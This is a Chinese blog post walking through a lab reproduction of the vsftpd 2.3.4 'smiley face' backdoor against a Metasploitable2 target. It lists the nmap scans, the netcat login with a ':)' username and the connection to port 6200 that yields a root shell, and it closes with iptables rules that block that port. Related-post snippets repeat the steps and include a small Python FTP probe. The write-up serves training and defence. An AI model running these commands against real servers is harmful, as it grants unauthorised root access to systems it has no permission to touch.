Ftp笑脸漏洞复现(后门漏洞)

最新推荐文章于 2024-05-10 22:24:53 发布
最新推荐文章于 2024-05-10 22:24:53 发布
阅读量5.3k 收藏 19
点赞数 4
文章标签: 安全 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55857040/article/details/121896967
版权

目录

漏洞简介:

   这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞

实验环境:

实验准备

实验过程

小总结

 

漏洞简介:

   这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞

实验环境:

攻击机:kali  虚拟机            靶机:Metasplotable2-Linux

虚拟机的网络连接都选择 NAT模式

实验准备

①nmap命令扫描找出同网段下靶机的IP(我只开了两个虚拟机,所以我nmap出来的两个ip除了主机就是靶机,其目的最终只是要找到靶机ip,可以有多种途径)

nmap 192.xxx.xxx.0/24   (这里192.xxx.xxx是网段,即IP192.xxx.xxx.xxx的前三部分,该命令用来扫描相同网段下存活的主机)

 得到靶机ip并发现打开着21ftp服务端口

②获取版本号

nmap -sV 靶机的ip地址

发现是21端口那里使用的ftp服务是 vsftpd 2.3.4版本,所以知道靶机有笑脸漏洞

实验过程

 

kali终端依次输入命令:nc 目标靶机ip地址 21

                 user a:) 	(用户名必须带笑脸即 ":)" )
                 pass 1111 	(密码随意)

② 开启一个新的kali窗口输入下面命令

namp -p 6200 目标靶机的ip地址

在①操作登陆前和登陆后6200端口开放的情况

 

 

 

③输入命令连接6200端口后门

nc 目标靶机ip 6200

 

如上就是连接上6200端口,证明漏洞复现成功了,就是靶机的root管理员了,相当于利用漏洞获取了靶机管理权

小总结

一些服务的版本的更新换代是解决已发现的一些漏洞来提高安全保障,像这个带有vsftpd 2.3.4版本的服务器的21端口就已经是很久远的漏洞了,早已被修复,只能用来做训练,但我们要知道的是我们要及时更新

②一些防范后门措施

安全配置

防火墙 (解决后门)

iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去

 

 

不不不知名小菜鸡
关注
  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VSFTPD2.3.4笑脸漏洞复现
m0_60466340的博客
12-11 808
在vsftpd2.3.4版本中有一个后门 ,在检测到用户名带有特殊字符:)时,会自动打开6200端口。 复现过程: 用nmap扫面本网段内的主机,发现有打开21端口,用于传输ftp的主机 探测该主机的ftp服务器版本信息,可以看到该版本是存在笑脸漏洞的版本 用netcat连接该主机的21端口,输入带有:)的用户名,和随便一个password 这时候就是以root的权限登录了,可以通过netcat查看6200端口的用户信息 ...
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 889
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 4860
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
Ftp笑脸漏洞(VSFTPD 2.3.4)复现后门漏洞
最新发布
m0_62670778的博客
05-10 933
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
6-1漏洞利用-FTP漏洞利用
山兔的博客
06-30 4023
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。FTP在传输时,需要对应的用户用户分类:1、Real用户管理者在管理FTP服务器,为每一个用户创建对应名称的real用户或者是它有自己名称的用户,我们用户登录FTP服务器时,使用的是real用户的账号密码,这个时候,我们登录只能查看自己所在文件夹的内容,不能查看其它文件夹2、Administrator管理员登录之后,
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1832
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
vsftpd 2.3.4 带漏洞版本 可复现
09-26
在分析或研究此漏洞的过程中,"vsftpd-2.3.4-infected"这个文件可能是包含了被该漏洞影响的vsftpd服务的复现环境或者漏洞利用脚本。这样的资源对于安全研究人员理解漏洞机制、开发检测工具和构建防御策略非常有价值...
vsftpd FTP Server lsc远程拒绝服务漏洞
07-03
vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
漏洞分析报告-FTP.docx
10-24
漏洞分析
redhat5-ftp漏洞rpm包
08-11
redhat5-ftp漏洞CVE-2011-0762的漏洞补丁,rpm -Uvh vsftpd-2.0.5-16.el5_6.1.i386.rpm
扫描FTP默认漏洞工具
03-01
扫描FTP默认漏洞 扫描FTP默认漏洞 扫描FTP默认漏洞 扫描FTP默认漏洞
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 2030
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21号端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
FTP笑脸漏洞
weixin_44237647的博客
01-29 3757
首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。 FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。 03 ip 192.168.10.128 metasploitable ip 192.168.10.129 (简称meta) kali ip 192.168.10.133 主机 ip 192.168.1.4 FTP在03,meta上搭建。 ...
渗透测试(笑脸漏洞
m0_74300881的博客
12-13 340
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞
qq_58018041的博客
04-22 3639
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 8230
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
笑脸漏洞复现
qq_62623325的博客
11-24 797
笑脸漏洞复现
python 制作ftp漏洞扫描
05-12
下面是一个基本的Python代码示例,可以用来扫描FTP服务器漏洞: ```python import ftplib def check_ftp_vuln(hostname): try: ftp = ftplib.FTP(hostname) ftp.login('anonymous', 'anonymous') ftp.cwd('/.ssh') print('[+] ' + hostname + ' is vulnerable to FTP') ftp.quit() except Exception as e: print('[-] ' + hostname + ' is not vulnerable to FTP') check_ftp_vuln('ftp.example.com') ``` 这个脚本基于ftplib库,使用FTP协议连接到指定的主机。它尝试使用匿名登录来访问主机上的.ssh目录。如果成功访问,则表示主机存在FTP漏洞。否则,它会输出“[-] hostname is not vulnerable to FTP”。 请注意,这只是一个基本示例,不能检测所有可能的FTP漏洞。对于更复杂的扫描,您可能需要使用其他工具和技术来检测更多的漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值